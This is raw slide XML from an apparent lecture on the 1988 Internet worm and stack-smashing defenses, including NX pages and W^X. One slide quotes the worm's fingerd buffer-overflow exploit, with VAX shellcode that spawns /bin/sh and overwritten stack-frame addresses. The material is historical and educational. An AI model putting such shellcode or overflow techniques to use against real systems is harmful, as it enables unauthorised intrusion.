          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(patched)</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91120" y="2475360"/>
              <a:ext cx="2535120" cy="518760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="581760" y="2466000"/>
                <a:ext cx="2553840" cy="537480"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16874010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371" y="278928"/>
            <a:ext cx="4755101" cy="701193"/>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2800" dirty="0" smtClean="0"/>
              <a:t>Exploiting the BSD4.3 version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232528" y="132311"/>
            <a:ext cx="8579944" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t>[536];/* 1084 *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1400" dirty="0"/>
              <a:t>(i = 0; i &lt; 400; i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>[i] = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> &lt; 28; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>j++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>i+j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>] = "\335\217/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" smtClean="0"/>
              <a:t>                     \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>274;\344\371\344\342\241\256\343\350\357\256\362\351"[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  l556 = 0x7fffe9fc;/* Rewrite part of the stack frame */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  l560 = 0x7fffe8a8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>  l564 = 0x7fffe8bc;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>  l568 = 0x28000000;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
              <a:t>  l552 = 0x0001c020;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  ... /* reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0"/>
              <a:t> VAX */</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(s, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>));/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> == 536 */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  write(s, XS("\n"), 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0"/>
              <a:t>  sleep(5);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0" err="1"/>
              <a:t>test_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0"/>
              <a:t>(s, s, 10)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0" smtClean="0"/>
              <a:t>{ </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0"/>
              <a:t>    *fd1 = s;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0"/>
              <a:t>    *fd2 = s;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" sz="1400" dirty="0"/>
              <a:t>    return 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" sz="1400" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6017172" y="2227959"/>
            <a:ext cx="2906110" cy="2308324"/>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38320" y="245160"/>
              <a:ext cx="7092000" cy="3821400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="228960" y="235800"/>
                <a:ext cx="7110720" cy="3840120"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23710488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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 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5" name="Rounded Rectangle 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6" name="Rounded Rectangle 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7" name="Rounded Rectangle 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8" name="Rounded Rectangle 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9" name="Rounded Rectangle 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10" name="Rounded Rectangle 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11" name="Rounded Rectangle 1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12" name="Rounded Rectangle 1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3" name="Rounded Rectangle 1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Rounded Rectangle 1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16" name="Rounded Rectangle 15"/>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7" name="Rounded Rectangle 16"/>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18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5684344" y="1559482"/>
            <a:ext cx="2906110" cy="3293209"/>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r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> sin;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0"/>
              <a:t> i, p[2], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0"/>
              <a:t>, status;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0"/>
              <a:t>  FILE *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0" err="1"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" sz="1600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0"/>
              <a:t> *av[4]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1600" dirty="0"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rounded Rectangle 18"/>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0" name="Rounded Rectangle 19"/>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1" name="Rounded Rectangle 20"/>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2" name="Rounded Rectangle 21"/>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3" name="Rounded Rectangle 22"/>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24" name="Rounded Rectangle 23"/>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25" name="Rounded Rectangle 24"/>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6" name="Rounded Rectangle 25"/>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27" name="Rounded Rectangle 26"/>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29" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="0"/>
            <a:endCxn id="16"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280464" y="394137"/>
            <a:ext cx="3511273" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Stack executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>fingerd.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> main()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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40560" y="0"/>
              <a:ext cx="8081640" cy="5001480"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="331200" y="-9360"/>
                <a:ext cx="8100360" cy="5020200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41459272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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6060866" y="254450"/>
            <a:ext cx="2685602" cy="3580802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-02-11 at 9.31.03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83" y="359789"/>
            <a:ext cx="5551956" cy="427963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60866" y="3940361"/>
            <a:ext cx="2725964" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Boston Museum of Science</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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759240" y="1134360"/>
              <a:ext cx="7124760" cy="2551320"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="749880" y="1125000"/>
                <a:ext cx="7143480" cy="2570040"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36615109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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298335" y="545460"/>
            <a:ext cx="8430124" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Almost everyone hates their dissertation by the time they're done with it. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>… But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>thousands before you have suffered through writing a dissertation. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>And aside from that, grad school is close to paradise.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Many people remember it as the happiest time of their lives. And nearly all the rest, including me, remember it as a period that would have been, if they hadn't had to write a dissertation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The danger with grad school is that you don't see the scary part upfront. PhD programs start out as college part 2, with several years of classes. So by the time you face the horror of writing a dissertation, you're already several years in. If you quit now, you'll be a grad-school dropout, and you probably won't like that idea. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>When Robert got kicked out of grad school for writing the Internet worm of 1988, I envied him enormously for finding a way out without the stigma of failure. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593653" y="133513"/>
            <a:ext cx="3160378" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Paul Graham, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Undergraduation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"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284200" y="3663360"/>
              <a:ext cx="6361560" cy="1180800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2274840" y="3654000"/>
                <a:ext cx="6380280" cy="1199520"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27619351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descr="Screen Shot 2014-02-11 at 9.47.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4" y="101635"/>
            <a:ext cx="5506371" cy="4733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07205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552" y="205979"/>
            <a:ext cx="5456247" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack Smashing Defense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5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122730" y="306880"/>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6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1911225" y="110439"/>
            <a:ext cx="924991" cy="19055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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122730" y="621945"/>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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> / flags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692612" y="731901"/>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11225" y="841857"/>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10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1911225" y="1106653"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Screen Shot 2014-02-06 at 7.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4" y="1766945"/>
            <a:ext cx="6400800" cy="259099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22531" y="4401612"/>
            <a:ext cx="7101636" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(AMD did this first with AMD64, then Intel copied in Pentium 4, and ARM.)</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40560" y="2258280"/>
              <a:ext cx="8403480" cy="2723760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="331200" y="2248920"/>
                <a:ext cx="8422200" cy="2742480"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17012236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No-Execute Pages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
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753241" y="1504950"/>
            <a:ext cx="7521027"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smtClean="0"/>
              <a:t>Attempt to fetch an instruction from a page with NX bit is 1: FAULT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753242" y="2994712"/>
            <a:ext cx="7521027"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t>W^X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: OS should try to make all pages in memory either writable or executable, but not both!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
